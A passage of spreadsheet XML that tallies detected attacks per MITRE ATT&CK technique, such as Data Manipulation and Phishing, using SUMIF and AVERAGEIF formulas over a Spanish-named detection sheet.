        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>18</v>
      </c>
      <c r="N57" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>18</v>
      </c>
      <c r="O57" s="322" t="str">
        <f t="shared" si="1"/>
        <v>18 (18)</v>
      </c>
      <c r="P57" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>2</v>
      </c>
      <c r="Q57" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R57" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>17</v>
      </c>
      <c r="S57" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>217</v>
      </c>
      <c r="T57" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>61</v>
      </c>
      <c r="U57" s="4" t="str">
        <f t="shared" si="2"/>
        <v>61 (217)</v>
      </c>
      <c r="V57" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>5</v>
      </c>
      <c r="W57" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X57" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>34</v>
      </c>
      <c r="Y57" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>228</v>
      </c>
      <c r="Z57" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>67</v>
      </c>
      <c r="AA57" s="322" t="str">
        <f t="shared" si="3"/>
        <v>67 (228)</v>
      </c>
      <c r="AB57" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>5</v>
      </c>
      <c r="AC57" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD57" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>36</v>
      </c>
      <c r="AE57" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>93</v>
      </c>
      <c r="AF57" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>85</v>
      </c>
      <c r="AG57" s="322" t="str">
        <f t="shared" si="4"/>
        <v>85 (93)</v>
      </c>
      <c r="AH57" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>17</v>
      </c>
      <c r="AI57" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ57" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>25</v>
      </c>
      <c r="AK57" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>321</v>
      </c>
      <c r="AL57" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>152</v>
      </c>
      <c r="AM57" s="322" t="str">
        <f t="shared" si="5"/>
        <v>152 (321)</v>
      </c>
      <c r="AN57" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>28</v>
      </c>
      <c r="AO57" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP57" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>42</v>
      </c>
      <c r="AQ57" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR57" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS57" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT57" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU57" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV57" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW57" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>23</v>
      </c>
      <c r="AX57" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>18</v>
      </c>
      <c r="AY57" s="322" t="str">
        <f t="shared" si="7"/>
        <v>18 (23)</v>
      </c>
      <c r="AZ57" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>2</v>
      </c>
      <c r="BA57" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB57" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>18</v>
      </c>
      <c r="BC57" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>240</v>
      </c>
      <c r="BD57" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>79</v>
      </c>
      <c r="BE57" s="4" t="str">
        <f t="shared" si="8"/>
        <v>79 (240)</v>
      </c>
      <c r="BF57" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>7</v>
      </c>
      <c r="BG57" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH57" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>35</v>
      </c>
      <c r="BI57" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>16</v>
      </c>
      <c r="BJ57" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>16</v>
      </c>
      <c r="BK57" s="322" t="str">
        <f t="shared" si="9"/>
        <v>16 (16)</v>
      </c>
      <c r="BL57" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>1</v>
      </c>
      <c r="BM57" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN57" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>16</v>
      </c>
      <c r="BO57" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>107</v>
      </c>
      <c r="BP57" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>106</v>
      </c>
      <c r="BQ57" s="4" t="str">
        <f t="shared" si="10"/>
        <v>106 (107)</v>
      </c>
      <c r="BR57" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>1</v>
      </c>
      <c r="BS57" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>12</v>
      </c>
      <c r="BT57" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU57" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>89</v>
      </c>
      <c r="BV57" s="292">
        <v>4</v>
      </c>
      <c r="BW57" s="322">
        <v>4</v>
      </c>
      <c r="BX57" s="4" t="str">
        <f t="shared" si="11"/>
        <v>4 (4)</v>
      </c>
      <c r="BY57" s="12">
        <v>1</v>
      </c>
      <c r="BZ57" s="13">
        <v>1</v>
      </c>
      <c r="CA57" s="394">
        <v>4</v>
      </c>
      <c r="CB57" s="288">
        <v>8</v>
      </c>
      <c r="CC57" s="4">
        <v>8</v>
      </c>
      <c r="CD57" s="4" t="str">
        <f t="shared" si="12"/>
        <v>8 (8)</v>
      </c>
      <c r="CE57" s="4">
        <v>1</v>
      </c>
      <c r="CF57" s="4">
        <v>1</v>
      </c>
      <c r="CG57" s="13">
        <v>1</v>
      </c>
      <c r="CH57" s="394">
        <v>4</v>
      </c>
    </row>
    <row r="58" spans="1:86" ht="15" customHeight="1">
      <c r="A58" s="4">
        <f t="shared" si="13"/>
        <v>56</v>
      </c>
      <c r="B58" s="4" t="str">
        <f>IFERROR(VLOOKUP(A58,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1565</v>
      </c>
      <c r="C58" s="493" t="str">
        <f>IFERROR(VLOOKUP(B58,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data Manipulation</v>
      </c>
      <c r="D58" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B58)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E58" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F58" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (1)</v>
      </c>
      <c r="G58" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>0</v>
      </c>
      <c r="H58" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>0</v>
      </c>
      <c r="I58" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J58" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>0</v>
      </c>
      <c r="K58" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>0</v>
      </c>
      <c r="L58" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>0</v>
      </c>
      <c r="M58" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N58" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O58" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P58" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q58" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R58" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S58" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>0</v>
      </c>
      <c r="T58" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>0</v>
      </c>
      <c r="U58" s="4" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V58" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>0</v>
      </c>
      <c r="W58" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>0</v>
      </c>
      <c r="X58" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>0</v>
      </c>
      <c r="Y58" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>1</v>
      </c>
      <c r="Z58" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>1</v>
      </c>
      <c r="AA58" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (1)</v>
      </c>
      <c r="AB58" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>0</v>
      </c>
      <c r="AC58" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD58" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>1</v>
      </c>
      <c r="AE58" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>4</v>
      </c>
      <c r="AF58" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>2</v>
      </c>
      <c r="AG58" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2 (4)</v>
      </c>
      <c r="AH58" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>2</v>
      </c>
      <c r="AI58" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ58" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>1</v>
      </c>
      <c r="AK58" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>5</v>
      </c>
      <c r="AL58" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>3</v>
      </c>
      <c r="AM58" s="322" t="str">
        <f t="shared" si="5"/>
        <v>3 (5)</v>
      </c>
      <c r="AN58" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>3</v>
      </c>
      <c r="AO58" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP58" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>1</v>
      </c>
      <c r="AQ58" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR58" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS58" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT58" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU58" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV58" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW58" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX58" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY58" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ58" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA58" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB58" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC58" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>0</v>
      </c>
      <c r="BD58" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>0</v>
      </c>
      <c r="BE58" s="4" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF58" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>0</v>
      </c>
      <c r="BG58" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>0</v>
      </c>
      <c r="BH58" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>0</v>
      </c>
      <c r="BI58" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ58" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK58" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL58" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM58" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN58" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO58" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>1</v>
      </c>
      <c r="BP58" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>1</v>
      </c>
      <c r="BQ58" s="4" t="str">
        <f t="shared" si="10"/>
        <v>1 (1)</v>
      </c>
      <c r="BR58" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS58" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>1</v>
      </c>
      <c r="BT58" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU58" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>1</v>
      </c>
      <c r="BV58" s="292">
        <v>0</v>
      </c>
      <c r="BW58" s="322">
        <v>0</v>
      </c>
      <c r="BX58" s="4" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY58" s="12">
        <v>0</v>
      </c>
      <c r="BZ58" s="13">
        <v>0</v>
      </c>
      <c r="CA58" s="394">
        <v>0</v>
      </c>
      <c r="CB58" s="288">
        <v>0</v>
      </c>
      <c r="CC58" s="4">
        <v>0</v>
      </c>
      <c r="CD58" s="4" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE58" s="4">
        <v>0</v>
      </c>
      <c r="CF58" s="4">
        <v>0</v>
      </c>
      <c r="CG58" s="13">
        <v>0</v>
      </c>
      <c r="CH58" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="59" spans="1:86" ht="15" customHeight="1">
      <c r="A59" s="4">
        <f t="shared" si="13"/>
        <v>57</v>
      </c>
      <c r="B59" s="4" t="str">
        <f>IFERROR(VLOOKUP(A59,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1566</v>
      </c>
      <c r="C59" s="493" t="str">
        <f>IFERROR(VLOOKUP(B59,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Phishing</v>
      </c>
      <c r="D59" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B59)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E59" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>172</v>
      </c>
      <c r="F59" s="579" t="str">
        <f t="shared" si="14"/>
        <v>2 (172)</v>
      </c>
      <c r="G59" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>1208</v>
      </c>
      <c r="H59" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>12</v>
      </c>
      <c r="I59" s="322" t="str">
        <f t="shared" si="0"/>
